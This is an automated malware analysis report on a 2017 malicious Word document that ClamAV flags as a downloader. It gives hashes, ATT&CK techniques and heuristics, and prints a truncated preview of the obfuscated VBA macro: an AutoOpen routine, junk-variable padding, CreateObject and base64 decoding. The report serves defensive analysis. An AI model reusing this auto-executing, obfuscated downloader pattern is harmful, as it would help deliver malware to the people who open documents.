Office (OLE) malware analysis — malicious · 09c3ddcfa4423f11

MALICIOUS

Office (OLE)

228.0 KB Created: 2017-04-28 10:51:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 531e879dadf5fbe5275e3c8795c50e9d SHA-1: a977c706a418e4b4c8b16e234585f11dffad6f51 SHA-256: 09c3ddcfa4423f119ce114a416e37a2292dbd08b9c65fb5a374a650a2bcc813d

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call and CreateObject, indicating an intent to execute arbitrary code. The ClamAV detection name 'Doc.Downloader.Heuristic-6312759-0' strongly suggests the macro's purpose is to download and execute a secondary payload.

Heuristics 8

ClamAV: Doc.Downloader.Heuristic-6312759-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Heuristic-6312759-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43682 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	43682 bytes
SHA-256: `c96ed86987223f9bcee7a9563f8eb3ef38660469a9bdd7a9f6fc46859e935077`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim wQtmLCE As Integer wQtmLCE = Sgn(19114) Dim bt4UoKOL As Long bt4UoKOL = Sgn(-1109646654) Dim BSLQW As Long BSLQW = -897989146 Dim E1Bp6oVf0 As Long E1Bp6oVf0 = Sgn(0) Dim kF2Wz As Double kF2Wz = Sgn(31893.692928932) Dim g2gJjUB As Boolean g2gJjUB = True Dim S4RLE As Long S4RLE = Sgn(-251003494) Dim IjqHCr As Boolean IjqHCr = False v1yZLu4F End Sub Attribute VB_Name = "Module2" Function khQdv(ByVal R20KqY) Dim BRycYj As Boolean BRycYj = True Dim W0HEn As Boolean W0HEn = True Dim qDFl15W As Single qDFl15W = Round(46273.527060298) Dim Amqwh As Long Amqwh = Sgn(0) Dim wyw6sZp As Double wyw6sZp = 28853.284192116 Dim E5wWX As Single E5wWX = Sgn(32638.632937161) Dim UQnws6R As Double UQnws6R = 45499.918604462 Dim wTADjst As Integer wTADjst = Sgn(-22571) Dim Wbp2itDAK Dim xb2g5Wk Dim wAesRQpVO As String wAesRQpVO = UCase(JgcahNL) Dim BapmLs1j As Boolean BapmLs1j = False Dim RSkIBCf As Long RSkIBCf = -981375342 Dim LlRqK5rv As Boolean LlRqK5rv = False Dim yrCWc As String yrCWc = Len(ArhEYqX) Dim yTmbke As Long yTmbke = Sgn(-1856659486) Dim F1xt2qZ0 As Single F1xt2qZ0 = 44625.158338517 Dim ggiTsPQA As Integer ggiTsPQA = 18239 Dim wdV6XzRZ0 As Boolean wdV6XzRZ0 = False Dim ExE3ni9 As Single ExE3ni9 = Int(51620.539091208) Dim aDecFOs As Byte aDecFOs = 134 Dim xCeP4 As Single xCeP4 = Sgn(42071.086951005) Dim ynlpA2Y As Boolean ynlpA2Y = True Dim z7Hf2y As Single z7Hf2y = Sgn(13633.552026243) Dim GBytW GBytW = Asc("E") Dim UdjaXb7rJ As Double UdjaXb7rJ = 50349.000628173 Dim PSLd3s As Single PSLd3s = Fix(20992.035646674) Dim jnJxK5 As Double jnJxK5 = 4126.1778889158 Dim xgilALC8 As Long xgilALC8 = Sgn(0) Dim p9WRbrF1 As Boolean p9WRbrF1 = False Dim DVcrlNA30 As Double DVcrlNA30 = Sgn(9859.2153510131) Dim KfOBb As Boolean KfOBb = False Dim DQxWzK1AP As Integer DQxWzK1AP = -17888 Dim wO85Hqjwd As Integer wO85Hqjwd = -32373 Dim Ea7Pwgldn Ea7Pwgldn = Val(NvwFd3) Dim oMx7A6c0l As Long oMx7A6c0l = -1182213244 Dim L8xQFns As Boolean L8xQFns = False Dim viEkx0 As Single viEkx0 = 22073.298626593 Dim AL6D87 As Boolean AL6D87 = True Dim CNxrL4n As Long CNxrL4n = -211193930 Dim fG7dXVE As Long fG7dXVE = 0 Set Wbp2itDAK = CreateObject("msxml2.domdocument") Dim rFDQ9L As Long rFDQ9L = Sgn(-1709018872) Dim Nq1gF0eG As String Nq1gF0eG = Val("&") Dim xCMZzt As Boolean xCMZzt = True Dim XxXqtmckp As Byte XxXqtmckp = 147 Dim J6hxgVDy As Byte J6hxgVDy = 205 Dim Hpi2zd0xX As Double Hpi2zd0xX = Int(15780.778689087) Dim WiQnEW As Integer WiQnEW = Sgn(32379) Dim Y7lSMg0 As Single Y7lSMg0 = Fix(44984.000010176) Dim PkbTtBLUl As Integer PkbTtBLUl = -9512 Dim natiJlYr5 natiJlYr5 = Val(J27Vjn) Dim BAVecrvI As Double BAVecrvI = 13114.320768791 Set xb2g5Wk = Wbp2itDAK.CreateElement("base64") Dim xMiAuy As Integer xMiAuy = Sgn(2272) Dim oFtlbWP9K As Integer oFtlbWP9K = Sgn(24597) Dim SYgo4BD As Boolean SYgo4BD = False Dim NI2OVyAz6 As Long NI2OVyAz6 = Sgn(-1863322718) Dim Bzd9FK3kq As Boolean Bzd9FK3kq = False Dim oz6LGPfZ As Single oz6LGPfZ = 62635.46753633 Dim GRjHel1B As Single GRjHel1B = Sgn(8152.7284043682) Dim NG5aUSn9H NG5aUSn9H = LCase(xQkfsL7Uw) Dim Jy7NCHkY As Integer Jy7NCHkY = Sgn(-16617) Dim Tiz1FpUd As Single Tiz1FpUd = Sgn(31589.963119238) Dim RDq6spk As Long RDq6spk = Sgn(-485500268) Dim kxaVMi As Single kxaVMi = Fix(48475.968916053) Dim FJd4nKHW As Single FJd4nKHW = Val(17625.110795628) Dim LBgQK4xEo As Byte LBgQK4xEo = 0 Dim SY42a As Single SY42a = Round(40109.773929756) Dim lkfONUbr As Boolean lkfONUbr = False Dim ZeDJx As Byte ZeDJx = 190 Dim JQV5H As Byte JQV5H = 126 xb2g5Wk.dataType = "bin.base64" Dim GXsc3Jv GXsc3Jv = AscW("+") Dim LGJSU As Byte L ... (truncated)

SHA-256: c96ed86987223f9bcee7a9563f8eb3ef38660469a9bdd7a9f6fc46859e935077

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim wQtmLCE As Integer
wQtmLCE = Sgn(19114)
Dim bt4UoKOL As Long
bt4UoKOL = Sgn(-1109646654)
Dim BSLQW As Long
BSLQW = -897989146
Dim E1Bp6oVf0 As Long
E1Bp6oVf0 = Sgn(0)
Dim kF2Wz As Double
kF2Wz = Sgn(31893.692928932)
Dim g2gJjUB As Boolean
g2gJjUB = True
Dim S4RLE As Long
S4RLE = Sgn(-251003494)
Dim IjqHCr As Boolean
IjqHCr = False
v1yZLu4F
End Sub

Attribute VB_Name = "Module2"
Function khQdv(ByVal R20KqY)

Dim BRycYj As Boolean
BRycYj = True
Dim W0HEn As Boolean
W0HEn = True
Dim qDFl15W As Single
qDFl15W = Round(46273.527060298)
Dim Amqwh As Long
Amqwh = Sgn(0)
Dim wyw6sZp As Double
wyw6sZp = 28853.284192116
Dim E5wWX As Single
E5wWX = Sgn(32638.632937161)
Dim UQnws6R As Double
UQnws6R = 45499.918604462
Dim wTADjst As Integer
wTADjst = Sgn(-22571)
Dim Wbp2itDAK
Dim xb2g5Wk
Dim wAesRQpVO As String
wAesRQpVO = UCase(JgcahNL)
Dim BapmLs1j As Boolean
BapmLs1j = False
Dim RSkIBCf As Long
RSkIBCf = -981375342
Dim LlRqK5rv As Boolean
LlRqK5rv = False
Dim yrCWc As String
yrCWc = Len(ArhEYqX)
Dim yTmbke As Long
yTmbke = Sgn(-1856659486)
Dim F1xt2qZ0 As Single
F1xt2qZ0 = 44625.158338517
Dim ggiTsPQA As Integer
ggiTsPQA = 18239
Dim wdV6XzRZ0 As Boolean
wdV6XzRZ0 = False
Dim ExE3ni9 As Single
ExE3ni9 = Int(51620.539091208)
Dim aDecFOs As Byte
aDecFOs = 134
Dim xCeP4 As Single
xCeP4 = Sgn(42071.086951005)
Dim ynlpA2Y As Boolean
ynlpA2Y = True
Dim z7Hf2y As Single
z7Hf2y = Sgn(13633.552026243)
Dim GBytW
GBytW = Asc("E")
Dim UdjaXb7rJ As Double
UdjaXb7rJ = 50349.000628173
Dim PSLd3s As Single
PSLd3s = Fix(20992.035646674)

Dim jnJxK5 As Double
jnJxK5 = 4126.1778889158
Dim xgilALC8 As Long
xgilALC8 = Sgn(0)
Dim p9WRbrF1 As Boolean
p9WRbrF1 = False
Dim DVcrlNA30 As Double
DVcrlNA30 = Sgn(9859.2153510131)
Dim KfOBb As Boolean
KfOBb = False
Dim DQxWzK1AP As Integer
DQxWzK1AP = -17888
Dim wO85Hqjwd As Integer
wO85Hqjwd = -32373
Dim Ea7Pwgldn
Ea7Pwgldn = Val(NvwFd3)
Dim oMx7A6c0l As Long
oMx7A6c0l = -1182213244
Dim L8xQFns As Boolean
L8xQFns = False
Dim viEkx0 As Single
viEkx0 = 22073.298626593
Dim AL6D87 As Boolean
AL6D87 = True
Dim CNxrL4n As Long
CNxrL4n = -211193930
Dim fG7dXVE As Long
fG7dXVE = 0
Set Wbp2itDAK = CreateObject("msxml2.domdocument")
Dim rFDQ9L As Long
rFDQ9L = Sgn(-1709018872)
Dim Nq1gF0eG As String
Nq1gF0eG = Val("&")
Dim xCMZzt As Boolean
xCMZzt = True
Dim XxXqtmckp As Byte
XxXqtmckp = 147
Dim J6hxgVDy As Byte
J6hxgVDy = 205
Dim Hpi2zd0xX As Double
Hpi2zd0xX = Int(15780.778689087)
Dim WiQnEW As Integer
WiQnEW = Sgn(32379)
Dim Y7lSMg0 As Single
Y7lSMg0 = Fix(44984.000010176)
Dim PkbTtBLUl As Integer
PkbTtBLUl = -9512
Dim natiJlYr5
natiJlYr5 = Val(J27Vjn)
Dim BAVecrvI As Double
BAVecrvI = 13114.320768791
Set xb2g5Wk = Wbp2itDAK.CreateElement("base64")
Dim xMiAuy As Integer
xMiAuy = Sgn(2272)
Dim oFtlbWP9K As Integer
oFtlbWP9K = Sgn(24597)
Dim SYgo4BD As Boolean
SYgo4BD = False
Dim NI2OVyAz6 As Long
NI2OVyAz6 = Sgn(-1863322718)
Dim Bzd9FK3kq As Boolean
Bzd9FK3kq = False
Dim oz6LGPfZ As Single
oz6LGPfZ = 62635.46753633
Dim GRjHel1B As Single
GRjHel1B = Sgn(8152.7284043682)
Dim NG5aUSn9H
NG5aUSn9H = LCase(xQkfsL7Uw)
Dim Jy7NCHkY As Integer
Jy7NCHkY = Sgn(-16617)
Dim Tiz1FpUd As Single
Tiz1FpUd = Sgn(31589.963119238)
Dim RDq6spk As Long
RDq6spk = Sgn(-485500268)
Dim kxaVMi As Single
kxaVMi = Fix(48475.968916053)
Dim FJd4nKHW As Single
FJd4nKHW = Val(17625.110795628)
Dim LBgQK4xEo As Byte
LBgQK4xEo = 0
Dim SY42a As Single
SY42a = Round(40109.773929756)
Dim lkfONUbr As Boolean
lkfONUbr = False
Dim ZeDJx As Byte
ZeDJx = 190
Dim JQV5H As Byte
JQV5H = 126
xb2g5Wk.dataType = "bin.base64"
Dim GXsc3Jv
GXsc3Jv = AscW("+")
Dim LGJSU As Byte
L
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.